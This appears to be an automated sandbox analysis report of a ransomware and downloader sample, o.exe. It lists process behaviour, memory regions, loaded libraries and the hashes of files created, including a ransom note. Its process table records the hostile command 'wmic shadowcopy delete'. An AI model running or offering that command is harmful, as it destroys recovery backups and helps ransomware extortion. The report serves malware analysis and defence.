d77378dc...c8d0 | Grouped Behavior
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Downloader, Ransomware

d77378dcc42b912e514d3bd4466cdda050dda9b57799a6c97f70e8489dd8c8d0 (SHA256)

o.exe

Windows Exe (x86-32)

Created at 2018-09-24 10:34:00

Notifications (2/3)

Due to a reputation service error, no query could be made to determine the reputation status of file hashes.

Some extracted files may be missing in the report since the maximum number of extracted files was reached during the analysis. You can increase the limit in the configuration settings.

The operating system was rebooted during the analysis.

Monitored Processes

Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x9fc Analysis Target High (Elevated) o.exe "C:\Users\EEBsYm5\Desktop\o.exe" -
#3 0xb10 Child Process High (Elevated) wmic.exe "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete #1
#11 0x4 Kernel Analysis System (Elevated) System - -
#13 0xe0 Child Process System (Elevated) smss.exe \SystemRoot\System32\smss.exe #11
#14 0xec Child Process System (Elevated) autochk.exe \??\C:\Windows\system32\autochk.exe * #13

Behavior Information - Grouped by Category

Process #1: o.exe
6231 1943
»
Information Value
ID #1
File Name c:\users\eebsym5\desktop\o.exe
Command Line "C:\Users\EEBsYm5\Desktop\o.exe"
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:01:49, Reason: Analysis Target
Unmonitor End Time: 00:04:04, Reason: Self Terminated
Monitor Duration 00:02:15
OS Process Information
»
Information Value
PID 0x9fc
Parent PID 0x5ac (c:\windows\explorer.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A00
0x A28
0x A2C
0x A38
0x A3C
0x A40
0x A44
0x A48
0x A4C
0x A50
0x A68
0x A6C
0x B0C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory rw True False False -
private_0x00000000000d0000 0x000d0000 0x000dffff Private Memory rw True False False -
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory rw True False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e6fff Pagefile Backed Memory rw True False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e0fff Pagefile Backed Memory rw True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory rw True False False -
private_0x0000000000100000 0x00100000 0x0010ffff Private Memory rw True False False -
pagefile_0x0000000000110000 0x00110000 0x001d7fff Pagefile Backed Memory r True False False -
private_0x00000000001e0000 0x001e0000 0x001e0fff Private Memory rw True False False -
private_0x00000000001f0000 0x001f0000 0x002effff Private Memory rw True False False -
pagefile_0x00000000002f0000 0x002f0000 0x003f0fff Pagefile Backed Memory r True False False -
private_0x0000000000400000 0x00400000 0x00400fff Private Memory rw True False False -
private_0x0000000000410000 0x00410000 0x00410fff Private Memory rw True False False -
private_0x0000000000420000 0x00420000 0x00420fff Private Memory rw True False False -
private_0x0000000000430000 0x00430000 0x00430fff Private Memory rw True False False -
private_0x0000000000440000 0x00440000 0x00440fff Private Memory rw True False False -
private_0x0000000000450000 0x00450000 0x00450fff Private Memory rw True False False -
private_0x0000000000460000 0x00460000 0x00460fff Private Memory rw True False False -
private_0x0000000000470000 0x00470000 0x0056ffff Private Memory rw True False False -
private_0x0000000000570000 0x00570000 0x0066ffff Private Memory rw True False False -
private_0x0000000000670000 0x00670000 0x0067ffff Private Memory rw True False False -
pagefile_0x0000000000670000 0x00670000 0x00676fff Pagefile Backed Memory rw True False False -
private_0x0000000000670000 0x00670000 0x00670fff Private Memory rw True False False -
pagefile_0x0000000000680000 0x00680000 0x00686fff Pagefile Backed Memory rw True False False -
private_0x0000000000680000 0x00680000 0x00680fff Private Memory rwx True False False -
pagefile_0x0000000000680000 0x00680000 0x00681fff Pagefile Backed Memory r True False False -
windowsshell.manifest 0x00690000 0x00690fff Memory Mapped File r False False False -
index.dat 0x00690000 0x00697fff Memory Mapped File rw True False False -
pagefile_0x00000000006a0000 0x006a0000 0x006a1fff Pagefile Backed Memory r True False False -
rsaenh.dll 0x006b0000 0x006ebfff Memory Mapped File r False False False -
index.dat 0x006b0000 0x006dbfff Memory Mapped File rw True False False -
rsaenh.dll 0x006e0000 0x0071bfff Memory Mapped File r False False False -
index.dat 0x006e0000 0x006effff Memory Mapped File rw True False False -
private_0x00000000006f0000 0x006f0000 0x006f0fff Private Memory rw True False False -
private_0x0000000000700000 0x00700000 0x00700fff Private Memory rwx True False False -
private_0x0000000000710000 0x00710000 0x00710fff Private Memory rw True False False -
private_0x0000000000720000 0x00720000 0x0072ffff Private Memory rw True False False -
sortdefault.nls 0x00730000 0x009fefff Memory Mapped File r False False False -
pagefile_0x0000000000a00000 0x00a00000 0x00a06fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000a10000 0x00a10000 0x00a11fff Pagefile Backed Memory rw True False False -
private_0x0000000000a20000 0x00a20000 0x00a20fff Private Memory rw True False False -
private_0x0000000000a30000 0x00a30000 0x00a30fff Private Memory rwx True False False -
private_0x0000000000a40000 0x00a40000 0x00a41fff Private Memory rw True False False -
private_0x0000000000a50000 0x00a50000 0x00a50fff Private Memory rw True False False -
private_0x0000000000a60000 0x00a60000 0x00a60fff Private Memory rw True False False -
private_0x0000000000a70000 0x00a70000 0x00a70fff Private Memory rwx True False False -
private_0x0000000000a70000 0x00a70000 0x00a72fff Private Memory rw True False False -
private_0x0000000000a80000 0x00a80000 0x00a82fff Private Memory rw True False False -
private_0x0000000000a80000 0x00a80000 0x00a93fff Private Memory rw True False False -
normidna.nls 0x00aa0000 0x00aaefff Memory Mapped File r False False False -
private_0x0000000000ab0000 0x00ab0000 0x00ab0fff Private Memory rw True False False -
private_0x0000000000ac0000 0x00ac0000 0x00ac1fff Private Memory rw True False False -
locale.nls 0x00ad0000 0x00b36fff Memory Mapped File r False False False -
private_0x0000000000b40000 0x00b40000 0x00b40fff Private Memory rw True False False -
private_0x0000000000b50000 0x00b50000 0x00b50fff Private Memory rwx True False False -
private_0x0000000000b60000 0x00b60000 0x00c5ffff Private Memory rw True False False -
private_0x0000000000c60000 0x00c60000 0x00c60fff Private Memory rw True False False -
private_0x0000000000c70000 0x00c70000 0x00c70fff Private Memory rw True False False -
private_0x0000000000c80000 0x00c80000 0x00c80fff Private Memory rw True False False -
private_0x0000000000c90000 0x00c90000 0x00c90fff Private Memory rwx True False False -
pagefile_0x0000000000c90000 0x00c90000 0x00c90fff Pagefile Backed Memory r True False False -
private_0x0000000000ca0000 0x00ca0000 0x00ca1fff Private Memory rw True False False -
private_0x0000000000d10000 0x00d10000 0x00e0ffff Private Memory rw True False False -
private_0x0000000000e10000 0x00e10000 0x00f9ffff Private Memory rw True False False -
private_0x0000000000e10000 0x00e10000 0x00f10fff Private Memory rw True False False -
private_0x0000000000f60000 0x00f60000 0x00f9ffff Private Memory rw True False False -
private_0x0000000000fa0000 0x00fa0000 0x0109ffff Private Memory rw True False False -
o.exe 0x010e0000 0x01112fff Memory Mapped File rwx True True False
pagefile_0x0000000001120000 0x01120000 0x01d1ffff Pagefile Backed Memory r True False False -
private_0x0000000001d20000 0x01d20000 0x01f3ffff Private Memory rw True False False -
private_0x0000000001d30000 0x01d30000 0x01e2ffff Private Memory rw True False False -
private_0x0000000001f00000 0x01f00000 0x01f3ffff Private Memory rw True False False -
pagefile_0x0000000001f40000 0x01f40000 0x02332fff Pagefile Backed Memory r True False False -
private_0x0000000002410000 0x02410000 0x0250ffff Private Memory rw True False False -
private_0x0000000002510000 0x02510000 0x02610fff Private Memory rw True False False -
private_0x00000000026c0000 0x026c0000 0x027bffff Private Memory rw True False False -
private_0x0000000002820000 0x02820000 0x0291ffff Private Memory rw True False False -
pidor.bmp 0x03df0000 0x042e1fff Memory Mapped File r True True False
opcservices.dll 0x6cd20000 0x6ce3efff Memory Mapped File rwx False False False -
xpsservices.dll 0x6ce40000 0x6cfe5fff Memory Mapped File rwx False False False -
dwrite.dll 0x6daf0000 0x6dbf9fff Memory Mapped File rwx False False False -
d2d1.dll 0x6dc00000 0x6dcb9fff Memory Mapped File rwx False False False -
xpsprint.dll 0x6dcc0000 0x6dd96fff Memory Mapped File rwx False False False -
davclnt.dll 0x6e460000 0x6e476fff Memory Mapped File rwx False False False -
ntlanman.dll 0x6e480000 0x6e493fff Memory Mapped File rwx False False False -
xpsgdiconverter.dll 0x6e4a0000 0x6e4e8fff Memory Mapped File rwx False False False -
prntvpt.dll 0x6e710000 0x6e72ffff Memory Mapped File rwx False False False -
sensapi.dll 0x6ee80000 0x6ee85fff Memory Mapped File rwx False False False -
davhlpr.dll 0x6f8f0000 0x6f8f7fff Memory Mapped File rwx False False False -
winspool.drv 0x70200000 0x70250fff Memory Mapped File rwx False False False -
mpr.dll 0x71d30000 0x71d41fff Memory Mapped File rwx False False False -
drprov.dll 0x71e70000 0x71e77fff Memory Mapped File rwx False False False -
rasman.dll 0x725f0000 0x72604fff Memory Mapped File rwx False False False -
rasapi32.dll 0x72610000 0x72661fff Memory Mapped File rwx False False False -
rtutils.dll 0x73390000 0x7339cfff Memory Mapped File rwx False False False -
winnsi.dll 0x737c0000 0x737c6fff Memory Mapped File rwx False False False -
iphlpapi.dll 0x737d0000 0x737ebfff Memory Mapped File rwx False False False -
ntmarta.dll 0x73c00000 0x73c20fff Memory Mapped File rwx False False False -
comctl32.dll 0x74360000 0x744fdfff Memory Mapped File rwx False False False -
version.dll 0x748d0000 0x748d8fff Memory Mapped File rwx False False False -
rsaenh.dll 0x74bf0000 0x74c2afff Memory Mapped File rwx False False False -
dnsapi.dll 0x74cd0000 0x74d13fff Memory Mapped File rwx False False False -
cryptsp.dll 0x74e50000 0x74e65fff Memory Mapped File rwx False False False -
sspicli.dll 0x752b0000 0x752cafff Memory Mapped File rwx False False False -
cryptbase.dll 0x752d0000 0x752dbfff Memory Mapped File rwx False False False -
winsta.dll 0x75340000 0x75368fff Memory Mapped File rwx False False False -
profapi.dll 0x75380000 0x7538afff Memory Mapped File rwx False False False -
msasn1.dll 0x753f0000 0x753fbfff Memory Mapped File rwx False False False -
crypt32.dll 0x75420000 0x7553cfff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x75680000 0x75720fff Memory Mapped File rwx False False False -
wldap32.dll 0x75730000 0x75774fff Memory Mapped File rwx False False False -
nsi.dll 0x75810000 0x75815fff Memory Mapped File rwx False False False -
shell32.dll 0x75830000 0x76479fff Memory Mapped File rwx False False False -
lpk.dll 0x76480000 0x76489fff Memory Mapped File rwx False False False -
imm32.dll 0x76490000 0x764aefff Memory Mapped File rwx False False False -
wininet.dll 0x76650000 0x76744fff Memory Mapped File rwx False False False -
ole32.dll 0x76750000 0x768abfff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
advapi32.dll 0x769f0000 0x76a8ffff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
user32.dll 0x76b40000 0x76c08fff Memory Mapped File rwx False False False -
oleaut32.dll 0x76c10000 0x76c9efff Memory Mapped File rwx False False False -
msctf.dll 0x76ca0000 0x76d6bfff Memory Mapped File rwx False False False -
usp10.dll 0x76d70000 0x76e0cfff Memory Mapped File rwx False False False -
shlwapi.dll 0x76e10000 0x76e66fff Memory Mapped File rwx False False False -
urlmon.dll 0x76e70000 0x76fa5fff Memory Mapped File rwx False False False -
iertutil.dll 0x76fb0000 0x771aafff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
normaliz.dll 0x77370000 0x77372fff Memory Mapped File rwx False False False -
ws2_32.dll 0x77380000 0x773b4fff Memory Mapped File rwx False False False -
sechost.dll 0x773c0000 0x773d8fff Memory Mapped File rwx False False False -
gdi32.dll 0x773e0000 0x7742dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd4000 0x7ffd4000 0x7ffd4fff Private Memory rw True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffd8fff Private Memory rw True False False -
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory rw True False False -
private_0x000000007ffda000 0x7ffda000 0x7ffdafff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory rw True False False -
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory rw True False False -
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
For performance reasons, the remaining 90 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Stars.htm 0.75 KB MD5: c30f7c451f90e4542386f657f17a5ccd
SHA1: a3a70f40cd384bfb8257b21e4e560b29c8c29fe7
SHA256: 2faca9452f7336aaf91b820386e2251b0f50d9f2d46e6b1f6ef2a317bb02899f
SSDeep: 24:e1SFs8TFfyRNTkEkW6lhI+rAp9FY/gLIiKQO/:eEFs85u2EkW6l7ru8KK7/
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3785418085-2572485238-895829336-1000\b652534aebe43ee746cbc40ead5a6d17_cdd36b99-6027-4bbf-bf10-e7f8b416e3fb 0.57 KB MD5: 04dc1c6221d635bf9c29eb1e6c8c1c15
SHA1: 7d7b77f284f1b071eea40baf53d0ed12c66fa662
SHA256: 48ef1b1da9290c33fde2a12a1c54dc6b10fedb110d120fbd57d0952116d0d8d4
SSDeep: 12:Xz+stIF3YxbgoTsdm2rTqUIpkD7JlgxbWC:D43Yxmdm2rTqVgfg97
False
C:\Users\EEBsYm5\AppData\Roaming\eybr.mp3 22.89 KB MD5: 707f84ec045133943b88addc931ff046
SHA1: d691d0adfa1e71a0d817d881ed74ecbb10b94e25
SHA256: 80a782a5110284ff7fa15736c8c617a55d290ea9a7964b1368cb294ccd43e56a
SSDeep: 384:0ul6a9Al1rOWjiqSEVnMXWBZgI9LySxLBC4FvScQnvd9m6wCJ2UOMgibADvlcjg9:l6ug1rOqVPVnSWDgItTXZvQXwC7OMgpF
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\06_Pictures_rated_4_or_5_stars.wpl 1.29 KB MD5: ca3fadf17a6cd05514e1bca65be2eeb8
SHA1: bd65cc62485579dccb3c884a40580642573b9d35
SHA256: e7e8e61d310b44d74719b88ad6faceb4299b0bc8f13a643295252b80fc274ae4
SSDeep: 24:GtuzM4T1KQx/bnOX2NPTQHISWBX1e2/0IZAJv59931j/B9UL3OkP:GtYM4TIQxCXckHlWW2/9wv5911j/Bue+
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm 0.76 KB MD5: 20fda93e224c1c9f93fb807a9aadc67b
SHA1: db4050e6573ccf241b9253e4c4ce76ee75107b01
SHA256: d336fc9e79ff7b9c20f66f5d19401169161fdb712c8257c2eb1b5146372cb3cc
SSDeep: 12:cbV9KSL+0bjA0te/K4vAg9Z3zSOHRM+w3WZdkBo1qqNxr5zYFsGZosr76AEC:YV8S0+4vA8jRM+70BWdraFV606O
False
C:\Users\Default\ntuser.ini 0.55 KB MD5: ea6c61a5e8d2449aeea082799e749211
SHA1: 8ba381c1483fd0c59d7995191c3182c36af9ff09
SHA256: 2d3d187bda08daa4cc4f617aa9bd697683317e599af9bc1e59b76f6cbf789d71
SSDeep: 12:ktd18ueIB0pFCWvHiBjAXskLRnkhV+PR4/8KfiNpKEzmwC:ktd1B+p1H08lLoV+Z03KbA
False
C:\Users\EEBsYm5\AppData\Roaming\40id.mkv 85.66 KB MD5: 856439921529ebb1d7f736c769066ecf
SHA1: 2d32e39201c68edd8c40cc05e8a176db62f0649c
SHA256: 35f6d579bd1c90b715afa45e91c99eaee024b9042778003ce1ee36c7eeeebb85
SSDeep: 1536:xSNQBpo7YKEXDyI0EFuDRsU+OFmab+s3Ot/TPKb9T3XesIGF1jeI7kjj:E4poMKpoFuOU+O8U+LjKpSsIM1jek2j
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm 0.78 KB MD5: 7f2a95721a46c7768c2794fca7818f48
SHA1: 789405bd1ddf8c39502bf4d8b270c7e62b1bfbc2
SHA256: b76e5e5f76e9e1d70977ffc2547aca875ae528de16184d4a5025975662e71c8c
SSDeep: 12:UZM2N7dNN6DTW/RAg2OsUFCrWMtIi3eU7Z+22sF+ZO/acQFdjG+xcuTdipwXwjBE:H2v/yW/RHsDrqctJEZQhQbS+C4dja6gc
False
C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\MSNBC News~.feed-ms 28.53 KB MD5: 4f871b7f359d21d75e6193e46cfce088
SHA1: 67a5b73f22897f6b191e8e6794323269b544086d
SHA256: 3a5657f6715cf8c1e99eca21e33129d9922ee4fca896146627a3dd06effa760a
SSDeep: 768:pCFSUtWGRZoPqS1jVMckq6e1m6tln25zxugNztAEl:BUt3oPqSgcv6ell2xQgBtAEl
False
C:\Users\Default\Favorites\Windows Live\Windows Live Mail.url 0.66 KB MD5: 5281a5e5f8e21d04ac3b83f929703cb7
SHA1: 078b9c631e460b2d8a374dfac0336cd7c2e60370
SHA256: 5046b4df6aa15549cd81ae9e074f1b75c90eef1617205183f383d509ef3349a0
SSDeep: 12:TulgZlnh2qhqhqRst1f0UoWzzp+iaMYjVXenDWLRQeafH5fmay7j9J4cxC/6C:TuKlnh2nhFttospzanjVOD+qTfH9u7j0
False
C:\Users\Default\Favorites\Microsoft Websites\IE site on Microsoft.com.url 0.66 KB MD5: 11690206385ef412171fc9b751182ffb
SHA1: fa05cd02291c1dc05178d73d3d800a96415bb75d
SHA256: 0dc9ef51cfb826568a3366bd1f545999f71e1f23a45170eec68d510d3ec051c1
SSDeep: 12:FooavJunFEqoe232EZTrgkcSJdVlpkSXK8NtwumLZTxCusC:moavgnFloe232UVlpTPNtyLZrV
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg 2.40 KB MD5: 09ef80e93c8e178155ea88ad8c64fa77
SHA1: a7c78ffaca70ba8e7e2a279391cdd40bbb6e1d5f
SHA256: adcf7c8500d27dd586d38a6cf8960cffb89e488cdfa77f8d69d9b9af825b9087
SSDeep: 48:xcKfmfB3YvFKXCHrhbaYHZhKMwKohvEMHxWqNcVV6zIQz96hWqQJ5Yy1:ynovkXCLdnK42MQWqNcyzIi4I5Jd
False
C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js 0.54 KB MD5: eff5a840cafee9119e5ba935c62427ff
SHA1: a2df7e77cf5d93f87a9aa415347e7b9c604739aa
SHA256: 68e8f63cb0a382702074c047abb9d685b6b6d274c2641892a786f868a0474aa0
SSDeep: 12:NF4Y1BqAjfIFd81Ty6Ksd7wsZZUGk77F7EwSomHY5/GlwU0FQC0C:Q6qAjAx6KsdEzhEwxmeGlwtFQCt
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm 0.75 KB MD5: fa4b52b42785d48b1970a6a47d5d95dc
SHA1: 18ba77b16b354ee8c92e5f5a8bf5738b3748404c
SHA256: d8a1c1033b272de4a7b5232f57299ceaadfa0e07e7f6a89dc42650ec84e9c85a
SSDeep: 12:FRJ/JDmadmJhWsUTX1gBfwiY2fo/5iuvmz9dURaf/rE4Y5kF5M2Szv/Gn0C:F/kJhoXXiYlhiuO3Uor7Y5kU1zH2
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\account{DD8DA3D5-48F0-4F18-846C-50E4200467F0}.oeaccount 1.18 KB MD5: 647400c8c615ae0bbae0e66c050be1f0
SHA1: 09dce00ae65f4ad81080b707c9fee1e37303ea26
SHA256: 896719eabf24e89d64c45108b87e81abab56995076b177adeb41bf12ab9d55d7
SSDeep: 24:4gvfNLLc06qjR7Q4B/3ekrj3pWsPxedQqloh4ew59eI7X0iWJ7BhtLVy:FL59OE3JPEVp9NYldLI
False
C:\Users\EEBsYm5\AppData\Roaming\D1Mcqgb3FDTv-8KryA5.jpg 76.34 KB MD5: b64ce85a92d617b4f4328943dc3b48c5
SHA1: e2ebb9614f7b396d3d5346959a9972f4fce1958e
SHA256: 8b081bb255dd3eb8b27f1569b888f4dfe5cdcf638b073ba1872f48b76a3e8e65
SSDeep: 1536:tm++TKTJjKDi+wLf2arHIeEtt6tayYqGMuLBF9mDTv5oifoo1puu:tm+eKTJjgi9JWekiKifR9
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb 66.93 KB MD5: a178bb3757271532807198ae2034ccb7
SHA1: 094fbe05113d6587fbedb2f2ee0074c9f7b7af52
SHA256: d142124d24eaba937b648e9582f3af09534450cc8d1783c88f2fe84ac4d6bd15
SSDeep: 1536:JHaIdIfg2I2m0uCqxb5UeETrYhs3zSnKLrS0cuv/QyPx1MFmwHfP8d:JHu6muCgcXIs3zS4201/QQIFmwHfP2
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\04_Music_played_in_the_last_month.wpl 1.78 KB MD5: f175bf1a56bdb6a0c89fb960230a6b4a
SHA1: 841fd7583648c9a970be8ead983b1ff980d21158
SHA256: c1e50ae901167d88f2f27f7d9c136550c5834c7b292daf8c40de0402eb058712
SSDeep: 48:Fxl+CG53BjVcYhFgCjOF+cUGzKKUKBTvtUtQVN+n9g:FVkgoxj5uRpvyQH+n9g
False
C:\Users\Default\Favorites\Microsoft Websites\IE Add-on site.url 0.66 KB MD5: 40e308e76be72564f8c265dc0b2153e6
SHA1: eaa55eb11bf4fb85bb37afc548e47bebd5a6a6cb
SHA256: 7cf95aa1b97b0869b71db4f538f254017c448d2e46d40e06b596083c44270b6d
SSDeep: 12:WPCGUswQNA91l17aEEiARE/PVxerxdjaMMwws2PkCmtt1AJoMgXEC:WCubNymRi6E/P7e15aMMyWmtt1AJnu
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg 6.78 KB MD5: c12c774292b6211dfe0763918af2988e
SHA1: 7304255c5af276980b2f711cff597c07d672bc79
SHA256: e18af46741c1fe541e96c40cac4ef4075410d042e966bf92fd809b9578d03c6e
SSDeep: 192:AoTcfKF1Fh1TsYkaR+qgrmfMS1XzFtg0GN5E2wxQ:3ofes3Ewm1l//GN5EBQ
False
C:\Users\Default\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm 0.75 KB MD5: 31a98a74dc566525eabae64752ca46e7
SHA1: 078d36536d10b5cfa161f15bc929557867ac0581
SHA256: 80bab6ebd122e3ebb91302d6d1b26ee97c2d59ee9fa15f3e447da0172349e6aa
SSDeep: 24:J6UwmnEWRgYHqnnAlNpwuiftTm4d2Mc0Nb9Jm4O:lwmnEWRAnypwuiBO0o
False
C:\Users\Default\Favorites\MSN Websites\MSN Sports.url 0.66 KB MD5: 531e543609937064983dbfd399932bcc
SHA1: 6cff70cc115a906e9f7c462028840e1a350ee79e
SHA256: a53cfbbc14aadf0980c488b9e7c9bf64dfd22213fd2fb737509ab8bb4036132d
SSDeep: 12:A3t8Zt/tJknJhAmJktenqzqEn3UCAtpnzCxUs0bhW4SqK7b8EJzjgOEre9+EC:Ad8Zt/sJho2RpnWx6uJmre9+d
False
C:\Users\Default\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\Microsoft at Work~.feed-ms 28.53 KB MD5: a25e8ba722ddc612bebe7b591223ff0f
SHA1: acb3eb40e04c39377622bba55e7e7da9ab884813
SHA256: d5b2f55728973c220dad3c90d4b3273f7e7becfe5d54f2695c64e70f59e5553f
SSDeep: 768:WFNgpIrrSXybyWtgZks0peYCAkkl6T7EJkAsnul9JBe5OYdGsEOP:Wr4IGybUms0pxzk+VJkAP9JCXdz7
False
C:\Recovery\94048722-4631-11e7-a593-a98775ceb0ae\boot.sdi 3.02 MB MD5: 2b9909fdea8fb580e0c902e462edf41c
SHA1: bb18f05acab12df6032256cbdec702cf9756efe8
SHA256: ce281434c12f290cc1c7704e41c2612b3fa186d017f288524f895067f7255da4
SSDeep: 24576:ugeknX9XKzyKUzyWWEUiNaKc9XJOwgcac8F1NEG369+PPdllBH/ve:uge0xKzyLzgAaXXY1NL36ipB/W
False
C:\Users\EEBsYm5\AppData\Roaming\H5WuKLQ 4 uu.mp3 56.22 KB MD5: 2a70304bd3d0fd0693b06f22b4564874
SHA1: 68abe7904868e796c5ce1b590da5da5df06d3321
SHA256: ea00449016e83af1963007638e6ddca14fbf2257720b76c1acc1306e3da4e076
SSDeep: 1536:zDlhPR/mf/5QDRuZvNU8slIRZhxd+u69USXuBDyfd:zDlFR6RtZVUPiPoU5yfd
False
C:\Users\Default\NTUSER.DAT.LOG1 193.53 KB MD5: 054149c493abea88d289f13678dc9bb3
SHA1: 0555e80f8a32375fcbccebe6e3a146ee442110fd
SHA256: cb68aea295249d60de6f8bde255772b4d617dadbbd2ac366da114ca4825e6989
SSDeep: 6144:CA8ViETAJXHwOabkATBDSlYo8JDNoMabFHVkkNa:6/u3ikGBDRo8NNolbFHVzs
False
C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Internet Explorer\UserData\index.dat 32.53 KB MD5: 3ae587e40a62bed97be33469e4749f40
SHA1: 1206d98147da7db758e46ac0365b2068a9fc6c0d
SHA256: 3d00c1362d92540499969f1a6d04b653ad8784f5f43a89449460bb731a39405e
SSDeep: 768:Uc9KyMRgx8WZnzSEm5nix9H2RAOnUdKldvc1yeZOeAN0a73a2Lvn2ezggOv:UGKyMo8czk5nsWeGU6dsyBeAXv2Yg7v
False
C:\\IBAGX-DECRYPT.html 63.77 KB MD5: 8c17ae2a4e8a386a93ef05f02821fbc4
SHA1: 0cad8851350065189f2ad048f765cb1575f6d60d
SHA256: d20c370aef35e65e75007b601f53e87de2a33f653b3aa6bf68ee7848746eab10
SSDeep: 384:No/7cdfUSQwGYZVI/IT9cGQ+aCB0I+iH+wUWjRLW/tydFl7gPE2VvegZuH2d9:Ne
False
C:\Users\EEBsYm5\AppData\Roaming\jEsyH8xMpokXjc mOu0.ods 63.59 KB MD5: edb811df3dea650e368e9b651a6a9184
SHA1: 976c0805c5063a2e73f176320380e396b913377d
SHA256: 23183ad9b75dd9f0cf0302cdf3f3c78a98ab09063474d5904bc5b6fdac8a94f6
SSDeep: 1536:LGh8IV5U823Vj3XPTD2Ef+bKZLJiVmBI/mgtgU:LGqI/Uv3VbTD2ySOLJiQYgU
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\12_All_Video.wpl 1.58 KB MD5: 4785b7b937059add40873186c78da206
SHA1: 2787a1e36de189e5f1ea4feaa3ff24ce61e622ae
SHA256: 602d52626f38d7b252170c0b14d8154321c1ac54046493c2b6a49afd69749847
SSDeep: 48:lVp0QpTgERlw1kvXhp8rFZWg6myivOMrRZ1ROlyB:mQWUwqPLUZWTgvOkfOli
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb 1.02 MB MD5: 759147dff1d103e4f37c451d20afb32d
SHA1: 4624b632f13d6c568f7019b60e9242dcc1c5d3df
SHA256: 613c601b4601fd8c0e6a7118661f2b3e92019f5b102b4e403f3f5e76a3491202
SSDeep: 24576:YSPlJfsvYCs6i7DsMLpTuMaeGHwL8P8huJqbVpmKI8jHR:YElJfQNa7DsMLpgHwL82/hjx
False
C:\Users\Default\Favorites\MSN Websites\MSN Entertainment.url 0.66 KB MD5: e834abb851ad70b73d96c7d3f80d8861
SHA1: e78d9db42842489f633dce85d96f357f451238fc
SHA256: f8be6489a346497d9d2df6895b92b96aa3f71c458e1bdfef2301bcba8443188e
SSDeep: 12:MVXF+mfZOLnBcr2jb7nogdz6GvWcsa9QXL8/YKCIeOnhYMAsX0C:S5oo2H7nZV6AqM8mhYRsXt
False
C:\Users\Default\AppData\Local\Microsoft\Feeds Cache\index.dat 32.53 KB MD5: fb971a91b0f824a8f3eed9d2f1a0da47
SHA1: 9541de218d6d7463a9538f40d06b70ddc4fe4116
SHA256: 0b45b6105d597481a5377513b992d6337e648a311ce9a0c32c505b5300ef3724
SSDeep: 768:8N1skyyHLcpfNhFv49S/YSxAcWK5dk9QiDK9v6n0:2TIpmAA+AcVvkPqk0
False
C:\Users\Default\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\0001692D\01_Music_auto_rated_at_5_stars.wpl 1.55 KB MD5: 14d44a791b667848a60c6416e8e2184a
SHA1: 74a8ca16ec8ce6cc5e42aff51b4dd3ed8eecd161
